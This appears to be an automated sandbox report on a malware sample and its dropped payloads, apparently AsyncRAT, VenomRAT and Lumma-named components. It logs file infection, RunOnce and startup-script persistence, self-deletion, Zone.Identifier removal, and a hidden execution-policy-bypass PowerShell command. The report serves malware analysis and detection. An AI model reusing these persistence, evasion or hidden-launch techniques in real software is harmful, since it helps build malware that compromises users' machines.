Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: devenum.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: devobj.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: msdmo.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: avicap32.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: msvfw32.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: msasn1.dll

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\753F.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\Desktop\7Y18r(14).exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: rust_dave_sideload.pdb source: vm.exe, 00000025.00000002.3761757300.0000000070078000.00000002.00000001.01000000.00000018.sdmp, lm.exe, 00000026.00000002.2910739213.0000000070008000.00000002.00000001.01000000.00000019.sdmp, vm.exe, 0000002B.00000002.2941431494.0000000070078000.00000002.00000001.01000000.00000018.sdmp, g2m.dll.32.dr, g2m.dll0.32.dr
Source:	Binary string: BitLockerToGo.pdb source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323520937.0000023B60790000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C000800000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C0008EC000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323973343.0000023B60750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 00000020.00000002.2624078104.0000020A687F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A687AD000.00000004.00000800.00020000.00000000.sdmp, lm.exe.32.dr
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.5.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: B552.exe, 0000001B.00000002.2349461776.000000C000400000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323520937.0000023B60790000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C000800000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000002.2354952612.000000C0008EC000.00000004.00001000.00020000.00000000.sdmp, B552.exe, 0000001B.00000003.2323973343.0000023B60750000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 00000020.00000002.2624078104.0000020A687F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A687AD000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000000.2595768222.0000000000402000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 00000025.00000002.3739220721.0000000000402000.00000002.00000001.01000000.00000016.sdmp, lm.exe, 00000026.00000000.2596792457.0000000000402000.00000002.00000001.01000000.00000017.sdmp, lm.exe, 00000026.00000002.2884350710.0000000000402000.00000002.00000001.01000000.00000017.sdmp, vm.exe, 0000002B.00000002.2871363883.0000000000402000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 0000002B.00000000.2753936670.0000000000402000.00000002.00000001.01000000.00000016.sdmp, lm.exe.32.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\7Y18r(14).exe	Unpacked PE file: 4.2.7Y18r(14).exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.gigug:W;.nigabu:R;.hud:W;.rsrc:R;sup:EW; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Unpacked PE file: 5.2.IXDaI.exe.ba0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Unpacked PE file: 17.2.IXDaI.exe.ee0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

.NET source code contains potential unpacker

Source: 37.2.vm.exe.4e40000.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])
Source: 43.2.vm.exe.28c0000.1.raw.unpack, ClientSocket.cs	.Net Code: Invoke System.AppDomain.Load(byte[])

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"

Source: initial sample

Static PE information: section where entry point is pointing to: sup

Source: 7Y18r(14).exe	Static PE information: section name: .gigug
Source: 7Y18r(14).exe	Static PE information: section name: .nigabu
Source: 7Y18r(14).exe	Static PE information: section name: .hud
Source: 7Y18r(14).exe	Static PE information: section name: sup
Source: IXDaI.exe.4.dr	Static PE information: section name: .aspack
Source: IXDaI.exe.4.dr	Static PE information: section name: .adata
Source: Uninstall.exe.5.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.5.dr	Static PE information: section name: PELIB
Source: MyProg.exe.5.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.5.dr	Static PE information: section name: u
Source: B552.exe.14.dr	Static PE information: section name: .xdata
Source: ftejced.14.dr	Static PE information: section name: .gigug
Source: ftejced.14.dr	Static PE information: section name: .nigabu
Source: ftejced.14.dr	Static PE information: section name: .hud
Source: ftejced.14.dr	Static PE information: section name: sup

Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00401CD1 push ecx; ret	4_2_00401CD2
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00401C91 push 00000076h; iretd	4_2_00401C93
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00402E96 push B92A2F4Ch; retf	4_2_00402E9B
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00601D38 push ecx; ret	4_2_00601D39
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00601CF8 push 00000076h; iretd	4_2_00601CFA
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_00602EFD push B92A2F4Ch; retf	4_2_00602F02
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_006E6763 push edx; ret	4_2_006E6764
Source: C:\Users\user\Desktop\7Y18r(14).exe	Code function: 4_2_006E87E1 push FFFFFFFBh; iretd	4_2_006E87F7
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA1638 push dword ptr [00BA3084h]; ret	5_2_00BA170E
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA2D9B push ecx; ret	5_2_00BA2DAB
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA6014 push 00BA14E1h; ret	5_2_00BA6425
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 5_2_00BA600A push ebp; ret	5_2_00BA600D
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00401CD1 push ecx; ret	16_2_00401CD2
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00401C91 push 00000076h; iretd	16_2_00401C93
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00402E96 push B92A2F4Ch; retf	16_2_00402E9B
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00517881 push FFFFFFFBh; iretd	16_2_00517897
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00515803 push edx; ret	16_2_00515804
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00671D38 push ecx; ret	16_2_00671D39
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00672EFD push B92A2F4Ch; retf	16_2_00672F02
Source: C:\Users\user\AppData\Roaming\ftejced	Code function: 16_2_00671CF8 push 00000076h; iretd	16_2_00671CFA
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE1638 push dword ptr [00EE3084h]; ret	17_2_00EE170E
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE600A push ebp; ret	17_2_00EE600D
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE2D9B push ecx; ret	17_2_00EE2DAB
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Code function: 17_2_00EE6014 push 00EE14E1h; ret	17_2_00EE6425
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C0DD5 push eax; ret	28_2_00007FF7C08C0DFD
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C0DC0 push eax; ret	28_2_00007FF7C08C0DFD
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C0DFE push eax; retf	28_2_00007FF7C08C0E1D
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C0D55 push eax; ret	28_2_00007FF7C08C0DFD
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C2E88 push E85D50DDh; ret	28_2_00007FF7C08C2EF9
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C08C00BD pushad ; iretd	28_2_00007FF7C08C00C1
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Code function: 28_2_00007FF7C09B23E1 push 8B485F90h; iretd	28_2_00007FF7C09B23E6

Source: 7Y18r(14).exe	Static PE information: section name: .text entropy: 7.471980252090664
Source: 7Y18r(14).exe	Static PE information: section name: sup entropy: 6.934340827164694
Source: IXDaI.exe.4.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.5.dr	Static PE information: section name: EpNuZ entropy: 6.934502658443004
Source: MyProg.exe.5.dr	Static PE information: section name: Y\|uR entropy: 6.934291252229405
Source: SciTE.exe.5.dr	Static PE information: section name: u entropy: 6.934650171158212
Source: ftejced.14.dr	Static PE information: section name: .text entropy: 7.471980252090664
Source: ftejced.14.dr	Static PE information: section name: sup entropy: 6.934340827164694

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Jump to dropped file
Source: C:\Users\user\Desktop\7Y18r(14).exe	File created: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B552.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\F6D9.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\753F.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ftejced	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ftejced

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 37.2.vm.exe.4e40000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.vm.exe.28c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.vm.exe.4e40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 43.2.vm.exe.28c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000002B.00000002.2883515347.00000000028C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.3753331272.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: Process Memory Space: vm.exe PID: 392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vm.exe PID: 5776, type: MEMORYSTR

Creates autostart registry keys with suspicious names

Source: C:\Windows\explorer.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUY

Jump to behavior

Drops VBS files to the startup folder

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUY	Jump to behavior
Source: C:\Windows\explorer.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#6110_8yUscnjrUY	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\7y18r(14).exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\ftejced:Zone.Identifier read attributes | delete

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 799

Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
